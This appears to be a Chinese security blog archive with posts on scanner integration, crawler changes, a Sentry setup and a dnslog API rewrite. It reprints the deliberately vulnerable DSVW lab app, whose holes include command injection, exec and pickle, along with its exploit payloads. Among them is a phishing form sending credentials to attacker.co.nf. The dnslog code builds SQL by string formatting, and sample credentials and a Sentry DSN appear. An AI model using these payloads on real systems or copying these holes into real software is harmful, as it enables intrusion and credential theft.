整合了一个wvs11的扫描

发布时间:July 14, 2017 // 分类:开发笔记,linux,python,windows // 10 Comments

最近忙里偷闲的整合了一个wvs11的扫描脚本。主要是借助了nmap和wvs11_api来实现。大概就是酱紫

主要是三台机器.
一台centos做子域名爆破+端口扫描+数据收集.
另外两台windows做wvs接收任务并启动扫描

关于wvs11的api之前有做过介绍
http://0cx.cc/about_awvs11_api.jspx
具体的利用方式以及导出为xml格式的报告。最后对xml进行处理的脚本都在
https://github.com/0xa-saline/acunetix-api

域名爆破修改自lijiejie的subDomainsBrute。加入第三方的收集,以及在端口扫描之前对ip进行处理.就是同c段的取最大和最小的来强制加入中间段的扫描.
https://github.com/0xa-saline/subDomainsBrute

端口扫描主要依赖是nmap。这里调用的是python-nmap
http://0cx.cc/solve_bug_withe-python-nmap.jspx
http://0cx.cc/some_skill_for_quen.jspx

主要是来判断端口以及对应的服务.如果出现来http/https的服务以后直接放入wvs里面扫描

部分插件调用的是bugscan的扫描脚本
http://0cx.cc/which_cms_online.jspx

其实主要的服务扫描则是非常漂亮的fenghuangscan.字典的加载方式则是参考了bugscan的加载。可以依赖于域名来切割加入字典

大概有这么一些服务类

多数是弱口令检测以及弱服务类型.

主要是把任务推送到wvs。看到wifi万能钥匙src放出来一些测试域名。测试来几个..

修改了一个爬虫htcap

发布时间:June 24, 2017 // 分类:开发笔记,代码学习,python // No Comments

修改htcap的数据库为mysql

好懒..拖延症.....本来早两个月以前就应该完成了的东西.在基友的催促下匆忙的修改了一下.修改了一个爬虫htcap,这个爬虫强大之处就是基于PhantomJS 实现的.数据库本来这个是基于sqlite3的.本屌感觉这个爬虫其实功能还是不错的.于是就修改了数据库为mysql.还稍微增加了一些功能

大概新增的功能如下

0.禁止dns刷新缓存 done

1.修改htcap的数据库为mysql done

2.增加常见统计代码和分享网站的过滤功能 done

3.增加常见静态后缀的识别 done

4.获取url在原有的robots基础上增加目录爆破和搜索引擎采集.识别一些不能访问的目录 done

5.砍掉sqlmap和Arachni扫描功能. done

6.增加页面信息识别功能.

7.增加重复去重和相似度去重功能

列举说明下

0x00.禁止dns刷新缓存

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket  
import requests
_dnscache={}  
def _setDNSCache():  
    """ 
    Makes a cached version of socket._getaddrinfo to avoid subsequent DNS requests. 
    """  

    def _getaddrinfo(*args, **kwargs):  
        global _dnscache  
        if args in _dnscache:  
            print str(args)+" in cache"  
            return _dnscache[args]  

        else:  
            print str(args)+" not in cache"    
            _dnscache[args] = socket._getaddrinfo(*args, **kwargs)  
            return _dnscache[args]  

    if not hasattr(socket, '_getaddrinfo'):  
        socket._getaddrinfo = socket.getaddrinfo  
        socket.getaddrinfo = _getaddrinfo  



def test(url):  
    _setDNSCache()  
    import time
    start = time.time()
    requests.get(url)
    end = time.time()
    print "first \t"+str(end-start)
    requests.get(url)
    sect = time.time()
    print "second \t"+str(sect - end)
    requests.get(url)
    print "third \t"+str(time.time() - sect)


if __name__ == '__main__':  
    url = "http://testphp.vulnweb.com"
    test(url)  

执行的结果还是比较满意

('0cx.cc', 80, 0, 1) not in cache
first   1.11360812187
('0cx.cc', 80, 0, 1) in cache
second  0.933846950531
('0cx.cc', 80, 0, 1) in cache
third   0.733961105347

但是又不是每一次都是ok的

('github.com', 443, 0, 1) not in cache
first   1.77086091042
('github.com', 443, 0, 1) in cache
second  2.0764131546
('github.com', 443, 0, 1) in cache
third   3.75542092323

不过这个方案虽好,但也有缺陷,罗列如下:
1.相当于只对socket.getaddrinfo打了一个patch,但socket.gethostbyname,socket.gethostbyname_ex还是走之前的策略
2.只对本程序有效,而修改/etc/hosts将对所有程序有效,包括ping

0x01.修改htcap的数据库为mysql

vi core/lib/DB_config.py
    #数据库信息
    'host' : 'localhost',
    'user' : 'root',
    'port' : '3306',
    'password' : 'mysqlroot',
    'db' : 'w3a_scan',

0x02.增加常见统计代码和分享网站的过滤功能

    def urlfilter(self):
        IGNORE_DOMAIN = [   #强制过滤域名.常见的bat和一些统计分享类的网站
            'taobao.com','51.la','weibo.com','qq.com','t.cn','baidu.com','gravatar.com','cnzz.com','51yes.com',
            'google-analytics.com','tanx.com','360.cn','yy.com','163.com','263.com','eqxiu.com','','gnu.org','github.com',
            'facebook.com','twitter.com','google.com'
        ]

....
and so on

测试站testphp.vulnweb.com

效果如下

1.没有做采集以及没有去重处理

. . initialized, crawl started with 10 threads
[=================================]   66 of 66 pages processed in 8 minutes
Crawl finished, 66 pages analyzed in 8 minutes


2.没有做采集和但是去重处理

3.做采集以及去重处理

. initialized, crawl started with 10 threads
[=================================]   108 of 108 pages processed in 43 minutes
Crawl finished, 108 pages analyzed in 43 minutes

ps:
采集前后的区别 66 108
去重前后的区别 85 65

唯一的缺点就是PhantomJS这玩意太特么占内存了..

https://github.com/0xa-saline/htcap_mysql

PS:因为PhantomJS作者不再维护PhantomJS项目了..估计这个也不会继续更新了

另外,不承担解决该爬虫导致的bug的问题

基于docker的sentry搭建过程

发布时间:April 13, 2017 // 分类:运维工作,开发笔记,linux,windows,python,生活琐事 // 2 Comments

最近拜读董伟明大牛的《python web实战开发》发现他推荐了一个神器sentry.恰好不久前还在和小伙伴讨论如何记录try--except的异常信息。发现刚好可以用上.

** 简介 **

Sentry’s real-time error tracking gives you insight into production deployments and information to reproduce and fix crashes.---官网介绍
Sentry是一个实时事件日志记录和汇集的日志平台,其专注于错误监控,以及提取一切事后处理所需的信息。他基于Django开发,目的在于帮助开发人员从散落在多个不同服务器上的日志文件里提取发掘异常,方便debug。Sentry由python编写,源码开放,性能卓越,易于扩展,目前著名的用户有Disqus, Path, mozilla, Pinterest等。它分为客户端和服务端,客户端就嵌入在你的应用程序中间,程序出现异常就向服务端发送消息,服务端将消息记录到数据库中并提供一个web节目方便查看。

** 安装 **
通过官方文档https://docs.sentry.io/ 可以得知,安装服务有两种方式,一种是使用Python,这种方式个人感觉比较麻烦。于是选择了第二种方式:使用docker[官方更加推荐]

这种方法需要先安装** docker **和 ** docker-compose **

0x01 安装docker
0x02 安装docker-compose
0x03 获取sentry
0x04 搭建sentry

我本地安装过了docker和docker-compose.直接从第三步开始

git clone https://github.com/getsentry/onpremise.git

获取到本地之后,就可以根据他的README.md开始着手搭建了,整个过程还是比较顺利的。

** step 1.构建容器并创建数据库和sentry安装目录 **

mkdir  -p data/{sentry,postgres}

** step 2.生成secret key并添加到docker-compose文件里 **

sudo docker-compose run --rm web config generate-secret-key

这个过程时间有点长。其间会提示创建superuser,用户名是一个邮箱,这个邮箱今后会收到sentry相关的消息,口令可以随便设置,只要自己记得住就可以了。

最后会在命令行输出一串乱七八糟的字符(形如:** z#4zkbxk1@8r*t=9z^@+q1=66zbida&dliunh1@p–u#zv63^g ** )
这个就是 secretkey,将这串字符复制到docker-compose.yml文件中并保存.取消SENTRY_SECRET_KEY的注释,并把刚刚复制的字符串插入其中,类似如下

** step 3.重建数据库,并创建sentry超级管理员用户 **

sudo docker-compose run --rm web upgrade

创建用户,sentry新建的时候需要一个超级管理员用户

** step 4.启动所有的服务 **

sudo docker-compose up -d


至此sentry搭建完成!

实际效果

from raven import Client
client = Client('http://f4e4bfb6d653491281340963951dde74:10d7b52849684a32850b8d9fde0168dd@127.0.0.1:9000/2')
    def find_result(self, sql,arg=''):
        try:
            with self.connection.cursor() as cursor:
                if len(arg)>0:
                    cursor.execute(sql,arg)
                else:
                    cursor.execute(sql)
                result = cursor.fetchone()
                self.connection.commit()
                return result

        except Exception, e:
            client.captureException()
            print sql,str(e)

print sql,str(e)

输出错误

client.captureException()

记录的错误日志

小型靶场一枚

发布时间:December 24, 2016 // 分类:工作日志,代码学习,python // 2 Comments

最近测试一些东西,需要用到靶场,类似xvwa,dvws这些.意外发现一个py的靶场,竟然可以满足大部分需求。主要是轻量级啊

其实整个文件代码很少,不足100行[实际99]

#!/usr/bin/env python
import BaseHTTPServer, cgi, cStringIO, httplib, json, os, pickle, random, re, socket, SocketServer, sqlite3, string, sys, subprocess, time, traceback, urllib, xml.etree.ElementTree
try:
    import lxml.etree
except ImportError:
    print "[!] please install 'python-lxml' to (also) get access to XML vulnerabilities (e.g. '%s')\n" % ("apt-get install python-lxml" if not subprocess.mswindows else "https://pypi.python.org/pypi/lxml")

NAME, VERSION, GITHUB, AUTHOR, LICENSE = "Damn Small Vulnerable Web (DSVW) < 100 LoC (Lines of Code)", "0.1m", "https://github.com/stamparm/DSVW", "Miroslav Stampar (@stamparm)", "Public domain (FREE)"
LISTEN_ADDRESS, LISTEN_PORT = "127.0.0.1", 65412
HTML_PREFIX, HTML_POSTFIX = "<!DOCTYPE html>\n<html>\n<head>\n<style>a {font-weight: bold; text-decoration: none; visited: blue; color: blue;} ul {display: inline-block;} .disabled {text-decoration: line-through; color: gray} .disabled a {visited: gray; color: gray; pointer-events: none; cursor: default} table {border-collapse: collapse; margin: 12px; border: 2px solid black} th, td {border: 1px solid black; padding: 3px} span {font-size: larger; font-weight: bold}</style>\n<title>%s</title>\n</head>\n<body style='font: 12px monospace'>\n<script>function process(data) {alert(\"Surname(s) from JSON results: \" + Object.keys(data).map(function(k) {return data[k]}));}; var index=document.location.hash.indexOf('lang='); if (index != -1) document.write('<div style=\"position: absolute; top: 5px; right: 5px;\">Chosen language: <b>' + decodeURIComponent(document.location.hash.substring(index + 5)) + '</b></div>');</script>\n" % cgi.escape(NAME), "<div style=\"position: fixed; bottom: 5px; text-align: center; width: 100%%;\">Powered by <a href=\"%s\" style=\"font-weight: bold; text-decoration: none; visited: blue; color: blue\" target=\"_blank\">%s</a> (v<b>%s</b>)</div>\n</body>\n</html>" % (GITHUB, re.search(r"\(([^)]+)", NAME).group(1), VERSION)
USERS_XML = """<?xml version="1.0" encoding="utf-8"?><users><user id="0"><username>admin</username><name>admin</name><surname>admin</surname><password>7en8aiDoh!</password></user><user id="1"><username>dricci</username><name>dian</name><surname>ricci</surname><password>12345</password></user><user id="2"><username>amason</username><name>anthony</name><surname>mason</surname><password>gandalf</password></user><user id="3"><username>svargas</username><name>sandra</name><surname>vargas</surname><password>phest1945</password></user></users>"""
CASES = (("Blind SQL Injection (<i>boolean</i>)", "?id=2", "/?id=2%20AND%20SUBSTR((SELECT%20password%20FROM%20users%20WHERE%20name%3D%27admin%27)%2C1%2C1)%3D%277%27\" onclick=\"alert('checking if the first character for admin\\'s password is digit \\'7\\' (true in case of same result(s) as for \\'vulnerable\\')')", "https://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OTG-INPVAL-005%29#Boolean_Exploitation_Technique"), ("Blind SQL Injection (<i>time</i>)", "?id=2", "/?id=(SELECT%20(CASE%20WHEN%20(SUBSTR((SELECT%20password%20FROM%20users%20WHERE%20name%3D%27admin%27)%2C2%2C1)%3D%27e%27)%20THEN%20(LIKE(%27ABCDEFG%27%2CUPPER(HEX(RANDOMBLOB(300000000)))))%20ELSE%200%20END))\" onclick=\"alert('checking if the second character for admin\\'s password is letter \\'e\\' (true in case of delayed response)')", "https://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OTG-INPVAL-005%29#Time_delay_Exploitation_technique"), ("UNION SQL Injection", "?id=2", "/?id=2%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20(SELECT%20id%7C%7C%27%2C%27%7C%7Cusername%7C%7C%27%2C%27%7C%7Cpassword%20FROM%20users%20WHERE%20username%3D%27admin%27)", "https://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OTG-INPVAL-005%29#Union_Exploitation_Technique"), ("Login Bypass", "/login?username=&amp;password=", "/login?username=admin&amp;password=%27%20OR%20%271%27%20LIKE%20%271", "https://www.owasp.org/index.php/Testing_for_SQL_Injection_%28OTG-INPVAL-005%29"), ("HTTP Parameter Pollution", "/login?username=&amp;password=", "/login?username=admin&amp;password=%27%2F*&amp;password=*%2FOR%2F*&amp;password=*%2F%271%27%2F*&amp;password=*%2FLIKE%2F*&amp;password=*%2F%271", "https://www.owasp.org/index.php/Testing_for_HTTP_Parameter_pollution_%28OTG-INPVAL-004%29"), ("Cross Site Scripting (<i>reflected</i>)", "/?v=0.2", "/?v=0.2%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_%28OTG-INPVAL-001%29"), ("Cross Site Scripting (<i>stored</i>)", "/?comment=\" onclick=\"document.location='/?comment='+prompt('please leave a comment'); return false", "/?comment=%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_%28OTG-INPVAL-002%29"), ("Cross Site Scripting (<i>DOM</i>)", "/?#lang=en", "/?foobar#lang=en%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_%28OTG-CLIENT-001%29"), ("Cross Site Scripting (<i>JSONP</i>)", "/users.json?callback=process\" onclick=\"var script=document.createElement('script');script.src='/users.json?callback=process';document.getElementsByTagName('head')[0].appendChild(script);return false", "/users.json?callback=alert(%22arbitrary%20javascript%22)%3Bprocess\" onclick=\"var script=document.createElement('script');script.src='/users.json?callback=alert(%22arbitrary%20javascript%22)%3Bprocess';document.getElementsByTagName('head')[0].appendChild(script);return false", "http://www.metaltoad.com/blog/using-jsonp-safely"), ("XML External Entity (<i>local</i>)", "/?xml=%3Croot%3E%3C%2Froot%3E", "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E" if not subprocess.mswindows else "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2FC%3A%2FWindows%2Fwin.ini%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E", "https://www.owasp.org/index.php/Testing_for_XML_Injection_%28OTG-INPVAL-008%29"), ("XML External Entity (<i>remote</i>)", "/?xml=%3Croot%3E%3C%2Froot%3E", "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22http%3A%2F%2Fpastebin.com%2Fraw.php%3Fi%3Dh1rvVnvx%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E", "https://www.owasp.org/index.php/Testing_for_XML_Injection_%28OTG-INPVAL-008%29"), ("Server Side Request Forgery", "/?path=", "/?path=http%3A%2F%2F127.0.0.1%3A631" if not subprocess.mswindows else "/?path=%5C%5C127.0.0.1%5CC%24%5CWindows%5Cwin.ini", "http://www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/"), ("Blind XPath Injection (<i>boolean</i>)", "/?name=dian", "/?name=admin%27%20and%20substring(password%2Ftext()%2C3%2C1)%3D%27n\" onclick=\"alert('checking if the third character for admin\\'s password is letter \\'n\\' (true in case of found item)')", "https://www.owasp.org/index.php/XPATH_Injection"), ("Cross Site Request Forgery", "/?comment=", "/?v=%3Cimg%20src%3D%22%2F%3Fcomment%3D%253Cdiv%2520style%253D%2522color%253Ared%253B%2520font-weight%253A%2520bold%2522%253EI%2520quit%2520the%2520job%253C%252Fdiv%253E%22%3E\" onclick=\"alert('please visit \\'vulnerable\\' page to see what this click has caused')", "https://www.owasp.org/index.php/Testing_for_CSRF_%28OTG-SESS-005%29"), ("Frame Injection (<i>phishing</i>)", "/?v=0.2", "/?v=0.2%3Ciframe%20src%3D%22http%3A%2F%2Fattacker.co.nf%2Fi%2Flogin.html%22%20style%3D%22background-color%3Awhite%3Bz-index%3A10%3Btop%3A10%25%3Bleft%3A10%25%3Bposition%3Afixed%3Bborder-collapse%3Acollapse%3Bborder%3A1px%20solid%20%23a8a8a8%22%3E%3C%2Fiframe%3E", "http://www.gnucitizen.org/blog/frame-injection-fun/"), ("Frame Injection (<i>content spoofing</i>)", "/?v=0.2", "/?v=0.2%3Ciframe%20src%3D%22http%3A%2F%2Fattacker.co.nf%2F%22%20style%3D%22background-color%3Awhite%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A10%3Btop%3A0%3Bleft%3A0%3Bposition%3Afixed%3B%22%20frameborder%3D%220%22%3E%3C%2Fiframe%3E", "http://www.gnucitizen.org/blog/frame-injection-fun/"), ("Clickjacking", None, "/?v=0.2%3Cdiv%20style%3D%22opacity%3A0%3Bfilter%3Aalpha(opacity%3D20)%3Bbackground-color%3A%23000%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A10%3Btop%3A0%3Bleft%3A0%3Bposition%3Afixed%3B%22%20onclick%3D%22document.location%3D%27http%3A%2F%2Fattacker.co.nf%2F%27%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert(%22click%20anywhere%20on%20page%22)%3B%3C%2Fscript%3E", "https://www.owasp.org/index.php/Testing_for_Clickjacking_%28OTG-CLIENT-009%29"), ("Unvalidated Redirect", "/?redir=", "/?redir=http%3A%2F%2Fattacker.co.nf", "https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet"), ("Arbitrary Code Execution", "/?domain=www.google.com", "/?domain=www.google.com%3B%20ifconfig" if not subprocess.mswindows else "/?domain=www.google.com%26%20ipconfig", "https://en.wikipedia.org/wiki/Arbitrary_code_execution"), ("Full Path Disclosure", "/?path=", "/?path=foobar", "https://www.owasp.org/index.php/Full_Path_Disclosure"), ("Source Code Disclosure", "/?path=", "/?path=dsvw.py", "https://www.imperva.com/resources/glossary?term=source_code_disclosure"), ("Path Traversal", "/?path=", "/?path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" if not subprocess.mswindows else "/?path=..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini", "https://www.owasp.org/index.php/Path_Traversal"), ("File Inclusion (<i>remote</i>)", "/?include=", "/?include=http%%3A%%2F%%2Fpastebin.com%%2Fraw.php%%3Fi%%3DN5ccE6iH&amp;cmd=%s" % ("ifconfig" if not subprocess.mswindows else "ipconfig"), "https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion"), ("HTTP Header Injection (<i>phishing</i>)", "/?charset=utf8", "/?charset=utf8%0D%0AX-XSS-Protection:0%0D%0AContent-Length:388%0D%0A%0D%0A%3C!DOCTYPE%20html%3E%3Chtml%3E%3Chead%3E%3Ctitle%3ELogin%3C%2Ftitle%3E%3C%2Fhead%3E%3Cbody%20style%3D%27font%3A%2012px%20monospace%27%3E%3Cform%20action%3D%22http%3A%2F%2Fattacker.co.nf%2Fi%2Flog.php%22%20onSubmit%3D%22alert(%27visit%20%5C%27http%3A%2F%2Fattacker.co.nf%2Fi%2Flog.txt%5C%27%20to%20see%20your%20phished%20credentials%27)%22%3EUsername%3A%3Cbr%3E%3Cinput%20type%3D%22text%22%20name%3D%22username%22%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput%20type%3D%22password%22%20name%3D%22password%22%3E%3Cinput%20type%3D%22submit%22%20value%3D%22Login%22%3E%3C%2Fform%3E%3C%2Fbody%3E%3C%2Fhtml%3E", "https://www.rapid7.com/db/vulnerabilities/http-generic-script-header-injection"), ("Component with Known Vulnerability (<i>pickle</i>)", "/?object=%s" % urllib.quote(pickle.dumps(dict((_.findtext("username"), (_.findtext("name"), _.findtext("surname"))) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))), "/?object=cos%%0Asystem%%0A(S%%27%s%%27%%0AtR.%%0A\" onclick=\"alert('checking if arbitrary code can be executed remotely (true in case of delayed response)')" % urllib.quote("ping -c 5 127.0.0.1" if not subprocess.mswindows else "ping -n 5 127.0.0.1"), "https://www.cs.uic.edu/~s/musings/pickle.html"), ("Denial of Service (<i>memory</i>)", "/?size=32", "/?size=9999999", "https://www.owasp.org/index.php/Denial_of_Service"))

def init():
    global connection
    BaseHTTPServer.HTTPServer.allow_reuse_address = True
    connection = sqlite3.connect(":memory:", isolation_level=None, check_same_thread=False)
    cursor = connection.cursor()
    cursor.execute("CREATE TABLE users(id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, name TEXT, surname TEXT, password TEXT)")
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")

class ReqHandler(BaseHTTPServer.BaseHTTPRequestHandler):
    def do_GET(self):
        path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
        code, content, params, cursor = httplib.OK, HTML_PREFIX, dict((match.group("parameter"), urllib.unquote(','.join(re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "v" in params:
                    content += re.sub(r"(v<b>)[^<]+(</b>)", r"\g<1>%s\g<2>" % params["v"], HTML_POSTFIX)
                elif "object" in params:
                    content = str(pickle.loads(params["object"]))
                elif "path" in params:
                    content = (open(os.path.abspath(params["path"]), "rb") if not "://" in params["path"] else urllib.urlopen(params["path"])).read()
                elif "domain" in params:
                    content = subprocess.check_output("nslookup " + params["domain"], shell=True, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
                elif "xml" in params:
                    content = lxml.etree.tostring(lxml.etree.parse(cStringIO.StringIO(params["xml"]), lxml.etree.XMLParser(no_network=False)), pretty_print=True)
                elif "name" in params:
                    found = lxml.etree.parse(cStringIO.StringIO(USERS_XML)).xpath(".//user[name/text()='%s']" % params["name"])
                    content += "<b>Surname:</b> %s%s" % (found[-1].find("surname").text if found else "-", HTML_POSTFIX)
                elif "size" in params:
                    start, _ = time.time(), "<br>".join("#" * int(params["size"]) for _ in range(int(params["size"])))
                    content += "<b>Time required</b> (to 'resize image' to %dx%d): %.6f seconds%s" % (int(params["size"]), int(params["size"]), time.time() - start, HTML_POSTFIX)
                elif "comment" in params or query == "comment=":
                    if "comment" in params:
                        cursor.execute("INSERT INTO comments VALUES(NULL, '%s', '%s')" % (params["comment"], time.ctime()))
                        content += "Thank you for leaving the comment. Please click here <a href=\"/?comment=\">here</a> to see all comments%s" % HTML_POSTFIX
                    else:
                        cursor.execute("SELECT id, comment, time FROM comments")
                        content += "<div><span>Comment(s):</span></div><table><thead><th>id</th><th>comment</th><th>time</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "include" in params:
                    backup, sys.stdout, program, envs = sys.stdout, cStringIO.StringIO(), (open(params["include"], "rb") if not "://" in params["include"] else urllib.urlopen(params["include"])).read(), {"DOCUMENT_ROOT": os.getcwd(), "HTTP_USER_AGENT": self.headers.get("User-Agent"), "REMOTE_ADDR": self.client_address[0], "REMOTE_PORT": self.client_address[1], "PATH": path, "QUERY_STRING": query}
                    exec(program) in envs
                    content += sys.stdout.getvalue()
                    sys.stdout = backup
                elif "redir" in params:
                    content = content.replace("<head>", "<head><meta http-equiv=\"refresh\" content=\"0; url=%s\"/>" % params["redir"])
                if HTML_PREFIX in content and HTML_POSTFIX not in content:
                    content += "<div><span>Attacks:</span></div>\n<ul>%s\n</ul>\n" % ("".join("\n<li%s>%s - <a href=\"%s\">vulnerable</a>|<a href=\"%s\">exploit</a>|<a href=\"%s\" target=\"_blank\">info</a></li>" % (" class=\"disabled\" title=\"module 'python-lxml' not installed\"" if ("lxml.etree" not in sys.modules and any(_ in case[0].upper() for _ in ("XML", "XPATH"))) else "", case[0], case[1], case[2], case[3]) for case in CASES)).replace("<a href=\"None\">vulnerable</a>|", "<b>-</b>|")
            elif path == "/users.json":
                content = "%s%s%s" % ("" if not "callback" in params else "%s(" % params["callback"], json.dumps(dict((_.findtext("username"), _.findtext("surname")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user"))), "" if not "callback" in params else ")")
            elif path == "/login":
                cursor.execute("SELECT * FROM users WHERE username='" + re.sub(r"[^\w]", "", params.get("username", "")) + "' AND password='" + params.get("password", "") + "'")
                content += "Welcome <b>%s</b><meta http-equiv=\"Set-Cookie\" content=\"SESSIONID=%s; path=/\"><meta http-equiv=\"refresh\" content=\"1; url=/\"/>" % (re.sub(r"[^\w]", "", params.get("username", "")), "".join(random.sample(string.letters + string.digits, 20))) if cursor.fetchall() else "The username and/or password is incorrect<meta http-equiv=\"Set-Cookie\" content=\"SESSIONID=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT\">"
            else:
                code = httplib.NOT_FOUND
        except Exception, ex:
            content = ex.output if isinstance(ex, subprocess.CalledProcessError) else traceback.format_exc()
            code = httplib.INTERNAL_SERVER_ERROR
        finally:
            self.send_response(code)
            self.send_header("Connection", "close")
            self.send_header("X-XSS-Protection", "0")
            self.send_header("Content-Type", "%s%s" % ("text/html" if content.startswith("<!DOCTYPE html>") else "text/plain", "; charset=%s" % params.get("charset", "utf8")))
            self.end_headers()
            self.wfile.write("%s%s" % (content, HTML_POSTFIX if HTML_PREFIX in content and GITHUB not in content else ""))
            self.wfile.flush()
            self.wfile.close()

class ThreadingServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
    def server_bind(self):
        self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        BaseHTTPServer.HTTPServer.server_bind(self)

if __name__ == "__main__":
    init()
    print "%s #v%s\n by: %s\n\n[i] running HTTP server at '%s:%d'..." % (NAME, VERSION, AUTHOR, LISTEN_ADDRESS, LISTEN_PORT)
    try:
        ThreadingServer((LISTEN_ADDRESS, LISTEN_PORT), ReqHandler).serve_forever()
    except KeyboardInterrupt:
        pass
    except Exception, ex:
        print "[x] exception occurred ('%s')" % ex
    finally:
        os._exit(0)

项目地址:https://github.com/stamparm/DSVW

改造dnslog的api为我们需要的输出方式

发布时间:December 13, 2016 // 分类:开发笔记,linux,python,windows,生活琐事 // No Comments

以前有cloudeye,发现它的api友好的不得了,后来又尝试过一段时间的ceye.io就是ceye.io其实不稳定,后来把目光转向了dnslog不得不说dnslog的开源确实是方便,但是它的api确实是蛋疼的紧
比如我们有一个whoami的参数

通过api查询

http://webadmin.secevery.com/api/web/www/whoami/

发现是false,仔细对比了下它的api函数,居然是

def api(request, logtype, udomain, hashstr):
    apistatus = False
    host = "%s.%s." % (hashstr, udomain)
    if logtype == 'dns':
        res = DNSLog.objects.filter(host__contains=host)
        if len(res) > 0:
            apistatus = True
    elif logtype == 'web':
        res = WebLog.objects.filter(path__contains=host)
        if len(res) > 0:
            apistatus = True
    else:
        return HttpResponseRedirect('/')
    return render(request, 'api.html', {'apistatus': apistatus})


host = "%s.%s." % (hashstr, udomain) 这尼玛~
只能查询xxxx.fuck.dns5.org的类型了.对于fuck.dns5.org/?cmd=fuck的形式好像不能查询。这尼玛~本想重新改写的.发现工程量太大了,就拿dnslog来修改api函数就好了
 #重新改写api
#1.默认访问全部的日志信息
#2.可以访问/api/xxxx/dns|web/
#3.可以精确定位到/api/xxxx/(dns|web)/xxxx/
步骤
#先获取userid 
#xxx = (select userid from logview_user where udomain = udomain)
 
再根据dns|web的方式分别执行sql语句
if logtype == 'dns':
        #需要执行的是select log_time,host from logview_dnslog where userid = xxx and path like '%hashstr%'
elif logtype == 'web':
        #需要执行的是SELECT "remote_addr","http_user_agent","log_time","path" FROM "logview_weblog" WHERE "user_id"=xxx and path like '%hashstr%'
 
这里的hashstr其实是可以为空的.就拿默认的数据库来测试

SELECT "log_time","remote_addr","http_user_agent","path" FROM "logview_weblog" WHERE user_id=(select id from logview_user where udomain = 'test') and path like '3%'
log_time    remote_addr http_user_agent path
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/favicon.ico

保持hashstr为空

SELECT "log_time","remote_addr","http_user_agent","path" FROM "logview_weblog" WHERE user_id=(select id from logview_user where udomain = 'test') and path like '%%'

结果依然是

log_time    remote_addr http_user_agent path
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/
113.135.96.202  Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36    123.test.dnslog.link/favicon.ico

这样就保证了xxx的完整性
 
大概改写后的api函数为

def api(request, logtype, udomain, hashstr):
    result = ''
    #首先保证udomain不能为空
    if len(udomain)>0:
        if logtype == 'dns':
            sql = "select log_time,host from logview_dnslog where userid = (select userid from logview_user \"
                "where udomain = {udomain}) and path like '%{hash}%'".format(udomain=udomain,hash=hashstr)
        elif logtype == 'web':
            sql = "SELECT log_time,remote_addr,http_user_agent,path FROM logview_weblog WHERE user_id=(select \"
